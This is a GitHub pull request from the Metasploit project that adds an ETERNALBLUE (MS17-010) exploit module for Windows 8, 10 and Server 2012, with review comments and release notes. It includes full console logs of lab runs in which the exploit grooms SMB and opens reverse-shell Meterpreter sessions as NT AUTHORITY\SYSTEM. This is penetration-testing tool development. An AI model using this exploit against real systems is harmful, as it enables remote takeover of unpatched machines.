New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add sleepya's ETERNALBLUE exploit for Win8+ as an external module #10184

Merged
merged 8 commits into from Jun 19, 2018

Conversation

Projects
None yet
6 participants
@wvu-r7
Copy link
Contributor

wvu-r7 commented Jun 18, 2018

WIP 馃嵒

This is a stopgap until we understand ETERNALBLUE well enough to add our own targets.

Tested on Windows 10 Enterprise Evaluation Build 10586 x64.

  • Test Windows 8
  • Test Windows 10
  • Test 2012
  • Replace this with original work
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows 10 Enterprise Evaluation 10586
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49671) at 2018-06-18 12:40:44 -0500

meterpreter > getuid
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >

Don't mind the first getuid, since I was impatient before stdapi was loaded.

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Jun 18, 2018

Jenkins test this please.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/eternalblue branch from 10687f0 to df4cee1 Jun 19, 2018

wvu-r7 added some commits Jun 19, 2018

Rename remote_exploit_generic template
Dropping "generic" from the name. I initially had some reservations
about leaving it in, and after discussion with @acammack-r7, we've
decided it adds nothing useful.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/eternalblue branch from e10d284 to 9913606 Jun 19, 2018

require 'msf/core/module/external'

class MetasploitModule < Msf::Exploit::Remote
Rank = <%= meta[:rank] %>

This comment has been minimized.

@acammack-r7

acammack-r7 Jun 19, 2018

Contributor

I think we can pull this into a shared template that looks something like:

Rank = <%= meta[:rank].capitalize %>Ranking

This comment has been minimized.

@wvu-r7

wvu-r7 Jun 19, 2018

Contributor

Generally only exploits and encoders use rank, but it's available to all modules. Shared template is fine. I like this change!

This comment has been minimized.

@wvu-r7

wvu-r7 Jun 19, 2018

Contributor

I've decided to move the logic into the shim and keep it for exploits right now. Let me know what you think!

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jun 19, 2018

Windows 8.1 tested:

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows 8.1 9600
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:49159) at 2018-06-19 16:29:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : LIVINGROOM-PC
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jun 19, 2018

Windows Server 2012 R2 tested:

msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] shellcode size: 1221
[*] numGroomConn: 13
[*] Target OS: Windows Server 2012 R2 Standard Evaluation 9600
[*] got good NT Trans response
[*] got good NT Trans response
[*] SMB1 session setup allocate nonpaged pool success
[*] SMB1 session setup allocate nonpaged pool success
[*] good response status for nx: INVALID_PARAMETER
[*] good response status: INVALID_PARAMETER
[*] done
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2018-06-19 17:31:35 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-DEEAVK8VA6A
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

@busterb busterb removed the delayed label Jun 19, 2018

@busterb busterb merged commit 0820268 into rapid7:master Jun 19, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Jun 19, 2018

msjenkins-r7 added a commit that referenced this pull request Jun 19, 2018

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jun 19, 2018

Release Notes

This adds sleepya's MS17-010 ETERNALBLUE exploit variant for Windows 8, Windows 10, and Windows 2012 as an external module, exploit/windows/smb/ms17_010_eternalblue_win8. It also adds a generic exploit template for external modules and makes some improvements to the ranking system as well.

@OJ

This comment has been minimized.

Copy link
Contributor

OJ commented Jun 19, 2018

Great work folks 馃憤

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jun 19, 2018

馃檱

I'll have a second round of improvements later. Thanks!

@wvu-r7 wvu-r7 referenced this pull request Jun 20, 2018

Merged

Second round of updates to ETERNALBLUE external module #10189

2 of 2 tasks complete

@tdoan-r7 tdoan-r7 added the rn-exploit label Jul 5, 2018

@busterb busterb self-assigned this Oct 5, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment